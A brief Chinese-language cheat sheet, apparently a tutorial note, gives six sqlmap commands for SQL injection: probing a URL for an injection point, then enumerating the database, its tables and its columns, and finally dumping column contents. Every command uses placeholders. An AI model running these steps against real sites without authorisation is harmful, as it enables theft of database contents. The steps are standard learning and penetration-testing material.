1、首先判断是GET 请求还是POST请求
2、GET请求,直接通过URL判断是否存在注入点
sqlmap -u url
3、查询出数据库名称
sqlmap -u url --current-db
4、查询出表名
sqlmap -u url -D 数据库名 --tables
5、查询字段名
sqlmap -u url -D 数据库名 -T 表名 --columns
6、进行爆破
sqlmap -u url -D 数据库名 -T 表名 -C 列名,列名 --dump